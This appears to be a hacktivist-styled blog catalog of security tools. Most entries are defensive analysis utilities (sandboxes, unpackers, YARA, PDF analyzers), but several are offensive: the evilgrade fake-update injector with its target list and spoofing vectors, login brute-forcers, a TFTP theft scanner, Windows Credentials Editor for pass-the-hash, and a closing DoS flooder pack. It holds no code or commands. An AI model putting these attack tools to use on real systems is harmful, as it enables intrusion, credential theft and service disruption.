Anonymous tools

we have tools! we know how to use them!!! expect us!!nous avons des outil!!!nous savons nous en servir!!!!attendez-vous à nous!!!

Tools Catalog +trad fr

leave a comment »

Tools Catalog



Artemisa is an open source VoIP/SIP-specific honeypot software designed to connect to a VoIP enterprise domain as a user-agent backend in order to detect malicious activity at an early stage. Moreover, the honeypot can play a role in the real-time adjustment of the security policies of the enterprise domain where it is deployed.

Artemisa should work as a conventional user-agent of a VoIP/SIP domain. To achieve this, it provides modular configuration files where the administrator can set up the connection parameters as well as the Artemisa’s behavior.

The SIP registrar server of the domain should be also configured in order to let Artemisa be registered with a set of extensions (e.g. 5 extensions from 401 to 405). Once Artemisa is configured and launched, which is suggested to do it on a separate machine or virtual machine, it keeps listening and waiting for SIP activity. Normally, it’s expected NOT to see SIP activity on the honeypot, such as a call, since the honeypot doesn’t represent a human being. Thus, any call or message which reach the honeypot is suspicious and is analyzed.

The analysis involves the usage of different techniques and third-party tools to determine and classify the nature of the message. When the message is classified and a conclusion is obtained, Artemisa reports that in several ways such as running user-configurable scrits and sending an e-mail report. The user-configurable scripts allow the administrator to give Artemisa the enough power to adjust the domain policies in real-time.


Cuckoo is a lightweight solution that performs automated dynamic analysis of provided Windows binaries. It is able to return comprehensive reports on key API calls and network activity. Current features are:

* Retrieve files from remote URLs and analyze them.
* Trace relevant API calls for behavioral analysis.
* Recursively monitor newly spawned processes.
* Dump generated network traffic.
* Run concurrent analysis on multiple machines.
* Support custom analysis package based on AutoIt3 scripting.
* Intercept downloaded and deleted files.
* Take screenshots during runtime.

DNS Sinkhole

A sinkhole is defined like a process in which we redirect specific IP network targeted visitors for a variety of security factors just like analysis, diversion of attacks and detection of anomalous activities. It has extended been deployed by Tier-1 ISP’s globally commonly to protect their downstream customers. how ever for ones network administrators, sinkholes are commonly deployed to offer valuable intelligence relating to the security threats their networks are facing. Read on below for additional facts on sinkholes as well as the a couple of sorts of sinkhole implementation — darknets and honeynets and how you possibly can use them for getting valuable facts relating to threats and misconfigurations within your network.


DOMScan is utility to drive IE and capture real time DOM from the browser. It gives access to active DOM context along with JavaScripts. One can observe the DOM in detail using this utility. It has predefined rules to scan DOM. One can run the scan on existing DOM and fetch interesting entry points and calls. It allows tracing through JavaScript variables as well. Using this utility one can identify following vulnerabilities.

• DOM based XSS
• DOM based vulnerable calls
• Source of abuse and external content loading methods
• Possible DOM logic and business layer calls
• Same Origin Bypass calls and usage
• Mashup usage inside DOM
• Widget Architecture review using the tool


DOMTracer – Firefox Plugin (Trace DOM and JavaScript Calls)

# The DOM as seen in all the aforementioned cases needs to be analyzed in many aspects. Run-time analysis of the DOM/JavaScript is vital and aids one to look at the calls made during the ‘dynamic DOM manipulation’. The DOMTracer is a Firefox Extension for this same purpose. It has been written using the standard method of writing extensions using the XUL platform and the JavaScript language in majority. This is in beta and we are working on new features.


DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality.
Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it’s fixing. You can use that information to learn what causes software break. Also that information can help you write some protection codes for those specific vulnerabilities. It’s also used to write 1-day exploits by malware writers or security researchers.

This binary diffing technique is especially useful for Microsoft binaries. Not like other vendors they are releasing patch regularly and the patched vulnerabilities are relatively concentrated in small areas in the code. That makes the patched part more visible and apparent to the patch analyzers. There is a « eEye Binary Diffing Suites » released back in 2006 and it’s widely used by security researchers to identify vulnerabilities. Even though it’s free and opensource, it’s powerful enough to be used for that vulnerabilities hunting purpose. Now I’m releasing DarunGrim2 which is a C++ port of original python codes. DarunGrim2 is way faster than original DarunGrim.

Faster Universal Unpacker

FUU (Faster Universal Unpacker) is a GUI Windows Tool with a set of tools (plugins) to help you to unpack, decompress and decrypt most of the programs packed, compressed or encrypted with the very well knowns software protection programs like UPX, ASPack, FSG, ACProtect, etc.

The GUI was designed using RadASM and MASM. Every plugin included in the official release was written in ASM using MASM.

The core of every plugin use TitanEngine SDK from ReversingLabs under the hood, this help to the developer to write plugins very easy and very fast without the need to worry about some repetitive and boring functions like dump, fix the iat, add sections, etc. You can develop a plugin for FUU in a very easy way using TitanEngine.

Also, FUU include some extra tools like:

* Generic OEP Finder
* Cryto Signature Detector
* Generic Unpacker
* Signatures Detector (next release)



origami is a Ruby framework designed to parse, analyze, and forge PDF documents. This is NOT a PDF rendering library. It aims at providing a scripting tool to generate and analyze malicious PDF files. As well, it can be used to create on-the-fly customized PDFs, or to inject (evil) code into already existing documents.


* Create PDF documents from scratch.
* Parse existing documents, modify them and recompile them.
* Explore documents at the object level, going deep into the document structure, uncompressing PDF object streams and desobfuscating names and strings.
* High-level operations, such as encryption/decryption, signature, file attachments…
* A GTK interface to quickly browse into the document contents.


PDF Stream Dumper is a free tool that aids in the analysis of malicious PDF documents. It also has some features that can make it useful for PDF vulnerability development. Specialized tools that deal with obfuscated JavaScript code, low level PDF header and object reader are available. In terms of shellcode analysis, it has an integrated interface for libemu sctest, an updated build of iDefense sclog, and a shellcode_2_exe feature. JavaScript tools include integration with JS-Beautifier for code formatting, the ability to run portions of the script live for live de-obfuscation, as well as a pretty stable refactoring engine that will parse a script and replace all the screwy random function and variable names with logical sanitized versions for readability are also available.

Full feature list

* Supported filters: FlateDecode, RunLengthDecode, ASCIIHEXDecode, ASCII85Decode, LZWDecode
* Integrated shellcode tools:
o sclog gui (Shellcode Analysis tool)
o scdbg libemu based Shellcode analysis tool
o Shellcode_2_Exe functionality
o Export unescaped bytes to file
* Supports filter chaining (ie multiple filters applied to same stream)
* Supports unescaping encoded pdf headers
* Scriptable interface to process multiple files and generate reports
* View all pdf objects
* View deflated streams
* View stream details such as file offsets, header, etc
* Save raw and deflated data
* Search streams for strings
* Scan for functions which contain pdf exploits (dumb scan)
* Format javascript using js beautifier (see credits in readme)
* View streams as hex dumps
* Zlib compress/decompress arbitrary files
* Replace/update pdf streams with your own data
* Basic JavaScript interface so you can run parts of embedded scripts
* PdfDecryptor w/source – uses iTextSharp and requires .Net Framework 2.0
* Basic JavaScript de-obsfuscator
* Can hide: header only streams, duplicate streams, selected streams
* JS UI also has access to a toolbox class to
o simplify fragmented strings
o read/write files
o do hexdumps
o do unicode safe unescapes
o disassembler engine
o replicate some common Adobe API (new)

PDF Stream Dumper also supports unescaping/formatting manipulated PDF headers, as well as being able to decode filter chains (multiple filters applied to the same stream object.) via plugins and adds automation features via various VBS scripts.

Current Automation scripts include:

* csv_stats.vbs – Builds csv file with results from lower status bar for all files in a directory
* pdfbox_extract.vbs – use pdfbox to extract all images and text from current file
* string_scan.vbs – scan all decompressed streams in all files in a directory for a string you enter
* unsupported_filters.vbs – scan a directory and build list of all pdfs which have unsupported filters
* filter_chains.vbs – recursivly scans parent dir for pdfs that use multiple encoding filters on a stream.
* obsfuscated_headers.vbs – recursivly scans parent dir for pdfs that have obsfuscated object headers
* pdfbox_extract_text_page_by_page.vbs – uses pdfbox to extract page data into individual files


PyOLEScanner – Malicious Office File Detection

Read… for more background info

Version 1.3 contains:

1. Bug Fix.
2. More Shellcode Detection.
3. More API Detection.
4. SQLite Support.
5. OLE2 Macro Scan.
6. Office2007 (docx/pptx/xlsx) deflate and Macro checks.

Directory scan works too, in presence of encryption a ‘decrypted’ copy.

USAGE: python _suspect_document

Compatibility with Windows and Linux is mantained.


Flasm disassembles your entire SWF including all the timelines and events. Looking at disassembly, you learn how the Flash compiler works, which improves your ActionScript skills. You can also do some optimizations on the disassembled code by hand or adjust the code as you wish. Flasm then applies your changes to the original SWF, replacing original actions.

It’s also possible to embed Flasm actions in your ActionScript, making optimizing of large projects more comfortable.

Flasm is not a decompiler. What you get is the human readable representation of SWF bytecodes, not ActionScript source. If you’re looking for a decompiler, Flare may suit your needs. However, Flare can’t alter the SWF.


It’s most common use is the generation of asset libraries containing images (PNG and JPEG), fonts (TTF) or other SWF movies for use with MTASC- or haXe-compiled ActionScript, although swfmill can be used to produce both simple and complex SWF structures.

* built around an XSLT/EXSLT processor (libxslt)
* input and output of the XSLT transformation can be either XML or binary SWF
* XSLT commands for importing PNG, JPEG, TTF and SWF, and for mapping SWF ID numbers
* built-in « simple dialect » to support library creation and building simple SWFs

swfmill was originally written by Daniel Turing, but is now maintained by Daniel Cassidy. It includes substantial contributions by Ralf Fuest, Steve Webster and others.


Graudit is a simple script and signature sets that allows you to find potential security flaws in source code using the GNU utility grep. It’s comparable to other static analysis applications like RATS, SWAAT and flaw-finder.

Version 1.8

* -L operator does vim friendly line numbers
* Man pages and documentation updates
* PHP signature updates
* JSP signature updates
* Dotnet signature updates
* Perl signature updates and bug fixes
* Python signature updates
* Bug fixes for aux/ scripts
* More aux/ scripts
* Fixed ignore CVS directories by default


IEZoneAnalyzer is a utility for viewing and comparing Internet Explorer security zone settings. It is particularly valuable on systems controlled through Group Policy, on which the standard security settings dialog does not allow viewing of settings. IEZoneAnalyzer version 3 represents a total rewrite, adding a tremendous amount of new functionality compared to earlier versions. Note that IEZoneAnalyzer does not require administrative rights. It also does not have an installer – just run the utility directly. IEZoneAnalyzer does require.NET Framework 3.5.

Key features of IEZoneAnalyzer:

* View effective security zone settings for any security zone on the local computer or exported from a remote computer and identify whether each setting was established by policy.
* Compare settings between two or more security zones or templates.
* View and compare entire sets of settings captured on different computers or on a single computer over time (e.g., to determine whether a system has drifted from its baseline settings).
* Export results to Excel or to a Comma Separated Values (CSV) text file.
* Filter comparison results to show only differences or conflicts.
* Sort, reorder and resize result columns.
* Copy selected or all results to the clipboard.


The aim of the INetSim project is to perform a quick run-time analysis of the network behavior of unknown malware samples in a laboratory environment.

Modules for the simulation of the following services are included:

* POP3 / POP3S
* Ident
* Finger
* Syslog
* Dummy.

Immunity Debugger

Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry’s first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility.

-A debugger with functionality designed specifically for the security industry
-Cuts exploit development time by 50%
-Simple, understandable interfaces
-Robust and powerful scripting language for automating intelligent debugging
-Lightweight and fast debugging to prevent corruption during complex analysis
-Connectivity to fuzzers and exploit development tools


Mallory is a transparent TCP and UDP proxy. It can be used to get at those hard to intercept network streams, assess those tricky mobile web applications, or maybe just pull a prank on your friend.

In more technical terms, Mallory is an extensible TCP/UDP man in the middle proxy that is designed to be run as a gateway.

The goal is to man in the middle traffic for testing purposes. The ideal setup for Mallory is to have a “LAN” or “Victim” network that Mallory acts as the gateway for. This can be configured within a virtal machine environment using host only network interfaces. The victim virtual machines then configures the Mallory machine as the gateway by manually setting its gateway. The gateway machine will have at least one WAN interface that grants Internet access. The victim network then uses the Mallory gateway to route traffic.

Folder Structure

* ca – certificate authority files including Mallory’s private key
* certs – MiTM certs that are created on the fly
* db – directory where mallory stores all database files
* mallory – empty directory
* src – where the code lives
* scripts – scripts used to configure mallory enviorment

MiniFuzz File Fuzzer

MiniFuzz is a basic testing tool designed to help detect code flaws that may expose security vulnerabilities in file-handling code. This tool creates multiple random variations of file content and feeds it to the application to exercise the code in an attempt to expose unexpected and potentially insecure application behaviors.


NetworkScanViewer is a GUI application designed to help view the results of nessus (v4) and nmap (v5) scan results. It combines the functionality of both NessusViewer and NmapViewer.

The application loads the scan data from nessus and nmap XML, does some data cleansing, then displays the results on the results list. The list data can be sorted by clicking on the column headers, so it is easy to order and locate particular information. There is also the ability to filter on specific information like host, port, service etc so it is easy to drill down to specific information.

The export functionality exports using the data shown in the results list, so if you change the sort order or filter the results, then it is reflected in the export. It is also possible to permanently exclude scripts that just generate noise by right clicking on the item and selecting « Ignore Plugin » from the context menu. Excluded scripts can be re-added at any time by using the Options window.


* Data cleansing
* Export to CSV and XML
* Sortable data columns
* Data Filtering
* Script excluding


ProcNetMonitor is the free tool to monitor the network activity of all running process in the system. It displays all open network ports (TCP/UDP) and active network connections for each process. It has advanced color based auto analysis system to make it easy to distinguish network oriented processes from others with just one glance at the list.

It also presents unique ‘Port Finder’ feature to easily search for particular port in all running processes with just one click. It also comes with export feature to save the entire process-port list to standard HTML file for offline analysis.

SQLInject Finder

Brief Description¶

Simple python script that parses through a pcap and looks at the GET and POST request data for suspicious and possible SQL injects. Rules to check for SQL injection can be easily added. Output can be printed neatly on the command line or in tab delimited format.

The output includes:

* The suspicious IP address
* The attacked webpage
* The parameter and value used
* The frame number of the packet within the pcap (can be used to find exactly where the packet is in Wireshark)
* The reason why the request was flagged


With time, malware authors are becoming cleverer and are successfully finding ways of evading security software. The only thing standing between a ’clean’ machine and malware is a reverse engineer/malware analyser. As malwares get equiped with newer techniques, it is becoming imperative for reverse engineers to test for malwares in the time made available to them. Tools like TitanEngine will surely help us in our malware analysis & reverse engineering endeavours! It is one of the tools that we have been waiting for download since the time it was announced at the BlackHat 09!

TitanEngine is a an OPEN SOURCE framework from the Reversing Labs that can be used to perform over 250 functions! Best of all, you can have all of that automated. It can also be used to make new tools that work with PE files! Both – 32 bit & 64 bit formats are supported! It can be used to create all known types of unpackers. It’s features are:

* SDK has 250 documented functions
* Easy automation of all reversing tools
* Supports both x86 and x64
* Can create: Static, Dynamic & Generic unpackers
* Tested on over 150 unpackers
* Its free and open source–LGPL3!
* Integrated x86/x64 debugger
* Integrated x86/x64 disassembler
* Integrated memory dumper
* Integrated import tracer & fixer
* Integrated relocation fixer
* Integrated file realigner
* Functions to work with TLS, Resources, Exports,…

Tuluka kernel inspector

uluka is a new powerful tool (antirootkit), which has the following features:

* Detects hidden processes, drivers and devices
* Detects IRP hooks
* Identifies the substitution of certain fields in DRIVER_OBJECT structure
* Checks driver signatures
* Detects and restores SSDT hooks
* Detects suspicious descriptors in GDT
* IDT hook detection
* SYSENTER hook detection
* Displays list of system threads and allows you to suspend them
* IAT and Inline hook detection
* Shows the actual values of the debug registers, even if reading these registers is controlled by someone
* Allows you to find the system module by the address within this module
* Allows you to display contents of kernel memory and save it to disk
* Allows you to dump kernel drivers and main modules of all processes
* Allows you to terminate any process
* Is able to dissasemble interrupt and IRP handlers, system services, start routines of system threads and many more
* Allows to build the stack for selected device
* Much more..

Displays the above stated information in GUI for user to see and probably make use of those information for analysis


VERA, the reverse engineering visualization program based off the Ether Project.

Reverse Engineering by Crayon Slides from the Blackhat talk.…

Ether: Malware Analysis via Hardware Virtualization Extensions


WinAPIOverride32 is an open source and advanced api monitoring software for Windows operating systems. You can use it to monitor and/or override any function of a process! You can do it for API functions or executable internal functions. This can be specially helpful when you are dealing with malwares or trying to reverse engineer certain applications.

A few of WinAPIOverride32′s functions are:

* You can define filters on parameters or function result
* You can define filters on dll to discard calls from windows system dll
* You can hook functions inside the target process not only API
* You can hook asm functions with parameters passed through registers
* You can hook hardware and software exceptions
* Double and float results are logged
* You can easily override any API or any process internal function
* You can break process before or/and after function call to change memory or registers
* You can call functions which are inside the remote processes
* Can hook COM OLE and ActiveX interfaces
* User types (enum, struct and union) and user defines are supported
* All is is done like modules : you can log or override independently for any function
* Open Source
* A library is provided for developpers who intend to build their one hooking software

WinAPIOverride32 tries to fill the gap between classical API monitoring softwares and debuggers. You can also “break” a targeted application before or after a function call, allowing memory or registers changes; and it can directly call functions of the targeted application. This is a wonderful open source application, written in C++.

Windows System State Analyzer

The basic functionality of the System State Analyzer tool is to allow you to compare two snapshots taken at different points in time. This allows you to compare the state of a machine both before and after an application install or probably you could use it in your VM as a first step in malware analysis or reverse engineering

This tool is a part of the Windows 2008 R2 Logo Software Certification and Windows 2008 R2 Logo Program Software Certification toolkits. Hence you will need to download the toolkits to get the System State Analyzer tool.


YARA is a tool aimed at helping malware researchers to identify and classify malware samples. With YARA you can create descriptions of malware families based on textual or binary patterns contained on samples of those families. Each description consists of a set of strings and a Boolean expression which determines its logic


Binary analysis is imperative for protecting COTS (common off-the-shelf) programs and analyzing and defending against the myriad of malicious code, where source code is unavailable, and the binary may even be obfuscated. Also, binary analysis provides the ground truth about program behavior since computers execute binaries (executables), not source code. However, binary analysis is challenging due to the lack of higher-level semantics. Many higher level techniques are often inadequate for analyzing even benign binaries, let alone potentially malicious binaries. Thus, we need to develop tools and techniques which work at the binary level, can be used for analyzing COTS software, as well as malicious binaries.

The BitBlaze project aims to design and develop a powerful binary analysis platform and employ the platform in order to (1) analyze and develop novel COTS protection and diagnostic mechanisms and (2) analyze, understand, and develop defenses against malicious code. The BitBlaze project also strives to open new application areas of binary analysis, which provides sound and effective solutions to applications beyond software security and malicious code defense, such as protocol reverse engineering and fingerprint generation.


The fuzzer owes much of its efficiency to dynamically generating extremely long-winding sequences of DOM operations across multiple documents, inspecting returned objects, recursing into them, and creating circular node references that stress-test garbage collection mechanisms.

Detailed cross_fuzz fuzzing algorithm:

1. Open two windows with documents of any (DOM-enabled) type. Simple HTML, XHTML, and SVG documents are randomly selected as targets by default – although any other, possibly plugin-supported formats could be targeted instead.

2. Crawl DOM hierarchy of the first document, collecting encountered object references for later reuse. Visited objects and collected references are tagged using an injected property to avoid infinite recursion; a secondary blacklist is used to prevent navigating away or descending into the master window. Critically, random shuffling and recursion fanout control are used to ensure good coverage.

3. Repeat DOM crawl, randomly tweaking encountered object properties by setting them to a one of the previously recorded references (or, with some probability, to one of a handful of hardcoded « interesting » values).

4. Repeat DOM crawl, randomly calling encountered object methods. Call parameters are synthesized using collected references and « interesting » values, as noted above. If a method returns an object, its output is subsequently crawled and tweaked in a similar manner.

5. Randomly destroy first document using one of the several possible methods, toggle garbage collection.

6. Perform the same set of crawl & tweak operations for the second document, but use references collected from the first document for overwriting properties and calling methods in the second one.

7. Randomly destroy document windows, carry over a percentage of collected references to the next fuzzing cycle.


dirtyJOE – Java Overall Editor is a complex editor and viewer for compiled java binaries (.class files). Current version still has some limitations, but hopefully those will be removed within the next releases.

dirtyJOE is free for non-commercial use.

dirtyJOE is entirely written in C++, no third party libraries were used.

Main features:

* Viewer for: constant pool, methods, fields, attributes
* Editor for: constant pool, bytecode, file header


This tool was released way back in the year 2006 by Mr. Michal Zalewski. It is popularly believed that secure protocols such as SSH, HTTPS, FTPS, etc. are completely safe from monitoring. But, fl0p will prove you wrong.

fl0p is a simple flow-analyzing passive L7 fingerprinter. It passively examines the sequence of client-server exchanges inside your network with their their relative layer 7 payload sizes and transmission intervals. The result is then matched with a database of traffic pattern signatures to deduce its observations. It does so, not by sniffing, but just by matching the result. This is why having a good database is important.The database can be found in the fl0p.fp file. You sure can add and improve upon the database with your inputs.

From the output that the tool displays, you can decipher the IP addresses of the two hosts taking part in the communication. In case of HTTPS traffic, you can also possibly check for the site that the client has requested for.

It has been loosely based on another wonderful tool – p0f and has been coded in C. This being the reason, it is supported on many systems – Linux, *BSD, MacOS X, AIX, and Cygwin.

This can be an interesting if you have lots of time to pre-plan your attack. You can go on looking at the output and learn about the network.


JavaSnoop is a tool that lets you intercept methods, alter data and otherwise test the security of Java applications on your desktop. It does so, by allowing you to attach it to an existing process (like a debugger) and instantly begin tampering with method calls, run custom code, or just watch what’s happening on the system. How does it attach to an existing process? It installs stageloading “hooks” with the Java Instrumentation API and by working with some bytecodes.


It can be useful for string based analysis for Windows registry, API calls, IRC Commands, DLL’s called and anit-VMWare code detection. It displays detailed headers of PE with all its section details, import and export symbols etc. It can also perform an full ASCII dump of the PE along with other options. It can also generate various section of a PE, like the DOS Header, DOS Stub, PE File Header, Image Optional Header, Section Table, Data Directories, Sections, etc. Malware analyzer will also help you with code analysis and disassembling the malware. It can also perform an online malware check at Based on PeID signatures, it can also detect packers used to compress the file. It also provides a tracer functionality that can be used to identify anti-debugging calls tricks, file system manipulation calls, rootkit hooks, keyboard hooks, DEP setting changes, etc.


Build up a customizable automated malware analysis station by using only freely available components with the exception of the target OS (Windows XP) itself. Further a special focus lies in handling a huge amount of malware samples and the actual implementation at As primary goal the reader of this paper should be able to build up her own specific installation and configuration while being free in her decision which components to use.


pyREtic and the REpdb debugger allow easier access to obtaining source from closed source Python applications.

In a nutshell it allows you to take a object in memory back to source code, without needing access to the bytecode directly on disk. This can be useful if the applictions pyc’s on disk are obfuscated in one of many ways.

Presentation from blackhat here:


StreamArmor is the sophisticated tool for discovering hidden alternate data streams (ADS) as well as clean them completely from the system. It’s advanced auto analysis coupled with online threat verification mechanism makes it the best tool available in the market for eradicating the evil streams. StreamArmor comes with fast multi threaded ADS scanner which can recursively scan over entire system and quickly uncover all hidden streams. All such discovered streams are represented using specific color patten based on threat level which makes it easy for human eye to distinguish between suspicious and normal streams.

StreamArmor has built-in advanced file type detection mechanism which examines the content of file to accurately detect the file type of stream. This makes it great tool in forensic analysis in uncovering hidden documents/images/audio/video/database/archive files within the alternate data streams. StreamArmor is the standalone, portable application which does not require any installation. It can be copied to any place in the system and executed directly.


tcpdump is a common computer network debugging tool that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.


The Virtual USB Analyzer is a free and open source tool for visualizing logs of USB packets, from hardware or software USB sniffer tools. As far as we know, it’s the world’s first tool to provide a graphical visualization along with raw hex dumps and high-level protocol analysis.

The Virtual USB Analyzer is not itself a USB sniffer tool. It is just a user interface for visualizing logs. It currently supports three log formats, but it’s designed to be easily extensible. With a couple dozen lines of Python code, you can add support for your favorite log format.

We developed vusb-analyzer at VMware as an efficient way to debug our own USB virtualization stack. We wanted a tool that made it easy to see problems at a glance, and we wanted a way to solve both correctness and performance bugs. As a result, we ended up with what we think is a fairly unique tool. We’re excited to have the opportunity now to release this tool as open source software, under the MIT license.…
VMWare offers the possibility to dump any usb traffic at the lowest level to a dump file. We’ll describe here how to activate this feature, and additionally publish a script to convert the dump file to the PCAP format, suitable for use with wireshark.



Process Hacker

Process Hacker is a feature-packed tool for manipulating processes and services on your computer.

A simple, customizable tree view with highlighting showing you the processes running on your computer.
# Detailed performance graphs.
# A complete list of services and full control over them (start, stop, pause, resume and delete).
# A list of network connections.
# Comprehensive information for all processes: full process performance history, thread listing and stacks with dbghelp symbols, token information, module and mapped file information, virtual memory map, environment variables, handles, …
# Full control over all processes, even processes protected by rootkits or security software. Its kernel-mode driver has unique abilities which allows it to terminate, suspend and resume all processes and threads, including software like IceSword, avast! anti-virus, AVG Antivirus, COMODO Internet Security, etc. (just to name a few).
# Find hidden processes and terminate them. Process Hacker detects processes hidden by simple rootkits such as Hacker Defender and FU.
# Easy DLL injection and unloading – simply right-click a process and select « Inject DLL » to inject and right-click a module and select « Unload » to unload!
# Many more features…


During Penetration testing it can be seen that thick-clients sometimes communicate with a server whose IP address is hardcoded in to it.The HTTP communication between such client and server is harder to intercept and test. Sniff-n-Snip is a very useful utility in such scenarios. It sniffs for HTTP packets from the client to server and forwards them to your favorite proxy (Burp, WebScarab, Paros etc).

User Input:

The tool expects the following user input:

* Number of the listening interface. This number can be found using the « -l » switch.
* Source IP, Source Port (optional), Destination IP, and Destination Port of the tcp session that is to be sniffed
* Target IP and Target Port of the Interceptor Proxy. Typically values will be, 8080.
* The tool can be forced to listen on promiscuous mode with the « -p » switch. This is OFF by default.


* WinPcap should be installed on the system, the tool requires this library for sniffing packets.

TFTP Theft

TFTP Theft is a tool which allows one to quickly scan/bruteforce a tftp server for files and download them instantly. – downloads files based on a pattern or list of files – looks for tftp servers on a target ip address range

TFTPTheft is a collection of two scripts – one for downloading files from discovered targets and the other for discovering the targets. The names of these two Python scripts are – and So, you could consider this pretty complete. It is a tool which allows one to quickly scan/bruteforce a TFTP server for files and download them instantly. It can do so, because TFTP, the Trivial FTP protocol still suffers from a major drawback – no authentication.

isr evilgrade

It’s is a modular framework that allow us to take advantage of poor upgrade implementations by injecting fake updates.

What you can do is let ISR-Evilgrade know that some one is requesting for an update, and that is all. The rest will be done by the tool itself. The original tool will download an update as if it was downloaded from the main site instead of your internal update server! As of now, ISR-Evilgrade supports the following modules:

* Freerip 3.30
* Jet photo 4.7.2
* Teamviewer 5.1.9385
* ISOpen 4.5.0
* Istat.
* Gom
* Atube catcher 1.0.300
* Vidbox 7.5
* Ccleaner 2.30.1130
* Fcleaner
* Allmynotes 1.26
* Notepad++ 5.8.2
* Java 1.6.0_22 winxp/win7
* aMSN 0.98.3
* Appleupdate <= ( Safari 5.0.2 7533.18.5, <= Itunes, <= Quicktime 7.6.8 1675)
* Mirc 7.14
* Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
* Dap
* Winscp 4.2.9
* AutoIt Script
* Clamwin
* AppTapp Installer 3.11 (Iphone/Itunes)
* getjar (
* Google Analytics Javascript injection
* Speedbit Optimizer 3.0 / Video Acceleration
* Winamp 5.581
* TechTracker (cnet) 1.3.1 (Build 55)
* Nokiasoftware firmware update 2.4.8es (Windows software)
* Nokia firmware v20.2.011
* BSplayer 2.53.1034
* Apt ( < Ubuntu 10.04 LTS)
* Ubertwitter 4.6 (0.971)
* Blackberry Facebook | Twitter
* Cpan 1.9402
* VirtualBox (3.2.8 )
* Express talk
* Filezilla
* Flashget
* Miranda
* Orbit
* Photoscape.
* Panda Antirootkit
* Skype
* Sunbelt
* Superantispyware
* Trillian <=
* Adium 1.3.10 (Sparkle Framework)
* VMware

Attack vectors:

Internal scenary:
– Internal DNS access
– ARP spoofing
– DNS Cache Poisoning
– DHCP spoofing

External scenary:
– Internal DNS access
– DNS Cache Poisoning


Adobe and others uses javascript in pdfs to enhance standard workflow for example connecting to database ,spell checking,printing n viewing etc..when we open pdf in reader,it executes this javascript code(ya we all know that). so goal of spiderpig is to find bugs in pdf reader’s javascript engine. spiderpig reads methods prototype from an input file and creates pdf file. Most of the pdf fuzzers which are available on internet are file format fuzzers which tries to fuzz the adobe’s file format implementation.I didnt find one fuzzer which fuzzes adobe’s javascript imeplementaiton,so here we have spiderpig a javascript fuzzer for pdf file format which tries to screw up pdf reader using javascript methods.



Bruter is a parallel network login brute-forcer on Win32. This tool is intended to demonstrate the importance of choosing strong passwords. The goal of Bruter is to support a variety of services that allow remote authentication.

Cain & Abel

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocol.


KrbGuess is a small and simple tool which can be used during security testing to guess valid usernames against a Kerberos environment. It allows you to do this by studying the response from a TGT request to the KDC server. The tool works against both Microsoft Active Directory, MIT and Heimdal Kerberos implementations. In addition it will detect if an account lacks pre-authentication.

Medusa Parallel Network Login Auditor

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:

– Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.

– Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.

– Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.


Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behaviour based on network feedback. It allows for rapid, yet reliable large-scale auditing of multiple hosts.

Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more.

Ncrack was started as a « Google Summer of Code » Project in 2009. While it is already useful for some purposes, it is still unfinished, alpha quality software.

* Ncrack can now crack the Remote Desktop Protocol on all Windows versions from XP and above, with the introduction of the RDP module. Users are well advised tread for cracking Windows XP machines since they can’t handle many concurrent RDP connections.
* Implemented the SMB module which can crack Microsoft’s SMB/CIFS services as well as UNIX Samba servers.
* Introduced the ‘-f’ option, which forces Ncrack to quit cracking a service after it finds one credential for it. Specifying the option twice like ‘-f -f‘ will cause Ncrack tcompletely quit after any credential is found on any service.
* Added support for blank-password testing. Ncrack will now test a blank entry whenever it sees an empty line in any of the wordlists. The same behaviour applies for passing the options –user ” or –pass ”.
* Improved the Ncrack scorpion logwith an updated SVG version.


RSYaba is tool to run brute force attacks against various services in a similar way to Hydra and Medusa. The tool was written after bad experiences at getting existing tools working correctly with HTTP and SSH so it was decided to make a tool that would be easier to configure.
Download RSYaba

The tool is written in Ruby so modifying the scripts is a lot simpler than having to change C/C++ code then recompile. All the modules so far are based on standard Ruby gems so they handle all the protocol stuff which means there is a nice level of abstraction for the actual attack framework.

While writing the HTTP module, a feature was added that is missing in all the other HTTP bruteforcers, the ability to handle authentication that relies on a cookie already being set and, even stricter, forms that use unique tokens to prevent brute force attacks.

The tool currently supports HTTP, MySQL, and SSH and new modules will be added to it and this page updated accordingly.

Windows Credentials Editor

Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes). This can be used, for example, to perform pass-the-hash on Windows and also obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used in further attacks.
Supports Windows XP, 2003, Vista, 7 and 2008 (Vista was not actually tested yet, but it should work)


A very fast network logon cracker which support many different services

Dark Alley

Dangerous Kitten

« Dangerous Kitten » got its name from how it was originally spread–a rar embedded in a jpg, with the picture of a kitten in a hand, and the subtitle « It’s dangerous to go alone, take this ». It is a set of tools, many of which already on here, but there are some new tools that are not anywhere else on the w/i/ki.

Tool List (v3 update)

* Windows (and Wine for Linux and Mac fags)
o BWraep
o BWRaeper.NET
o Forum Proxy Leecher
o Longcat Flooder (distributed and standalone)
o Ping Flood
o rok/i/ts
o Sinflood
o wgetraep
o Some gay app to unlimit ip connectiosn
o SMTP Server
o All of the new DoS equipment
* Linux/Unix/Mac
o pygetraep
* Web-Based
